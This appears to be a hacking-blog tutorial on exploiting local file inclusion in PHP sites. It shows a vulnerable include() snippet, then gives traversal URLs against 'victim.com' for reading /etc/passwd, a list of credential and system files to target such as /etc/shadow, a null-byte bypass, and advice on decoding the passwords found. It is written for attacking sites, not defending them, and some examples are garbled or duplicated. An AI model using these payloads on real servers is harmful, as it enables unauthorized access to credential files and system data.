What make a website Vulnerable to LFI ?
A piece of PHP code makes a website vulnerable to LFI..Lets look at this code
$page = $_GET[page];
include($page);
?>
This code must not be used anywhere in a php script.Because the $page isn’t sanitized and is passed directly to the webpage, but unfortunately This code can be get many times in many popular websites.
Now we know why and how the webpage gets vulnerable.So lets talk for The rest Using the vulnerability for our advantage.
Let us now how this code gives us the ability to browse Thru the WEB SERVER
Now You all imagine that There is a file named saurav.php in the root directory of a website..
If you type
http://victim.com/root/saurav.php
You can get the access to that file Right ?
But if the piece of the php code is inside the Index.php then we can run the code using
http://victim.com/index.php?page=root/saurav.php
If the index.php was in victim.com/root/index.php and the saurav.php in http://victim.com/saurav.php you will have to type http://victim.com/test/index.php?page=../saurav.php . The ../ is called directory
transversal that will allow you to go up in the directories.
Now i think you understood this one..lets move on
Now we can have access to the Directories\files that the server doesn't allow.If it is hosted in a UNIX server then we can have access to the password files of the server..we will have to add ../ to cycle thru the directories..
Example
http://site.com/index.php?page=../../etc/passwd
http://site.com/index.php?page=../../../../../../etc/passwd
This depends on in which directory the the file passwd is present...
If you don't know what to do with the etc/passwd then read the full article...
The etc/passwd is where the users/passwords are stored, a non shadowed passwd file will look like this:
username: passwd:UID:GID:full_name:directory:shell
For example:
username:SaurRavhAckingclass:503:100:FullName:/home/user name:/bin/sh
All you need to do then is get the username and decode the password. If the passwd file is shadowed then you’ll see something like this:
username:x:503:100:FullName:/home/username:/bin/sh
Now you can see the password is "x" and the encoded password is now in /etc/shadow (you will probably not have access to etc/shadow because is only readable/writeable by root and etc/passwd has to be readable by many process, thats why you have access to it.
Here are some places that you can play with
THis site will help you more on this etc/passwd/etc/passwd
/etc/shadow
/etc/security/user
/etc/security/group
/etc/security/passwd
/etc/security/limits
/etc/security/environ
/etc/group
click here
There is another piece of code that may result in making a site vulnerable to LFI
$page = $_GET["page"];
include(“$page.php”);
?>
include(“$page.php”);
?>
In this case as you can see it will add .php to anything you include..So if you type
http://victim.com/index.php?page=../../../../etc/passwd
and it will show some error like the file does not exists you will have to apply a null byte ()
http://victim.com/index.php?page=../../../../etc/passwd
This null byte will ignore the everything after
There are many other ways to exploit a website using LFI...We can use perl scripts and many other things are there... i will discuss them someday other...
This article is going to be little difficult for a beginner..Read this thoroughly and search google for this
Happy Hacking
Credits - planet creator
Credits - planet creator
0 comments:
Post a Comment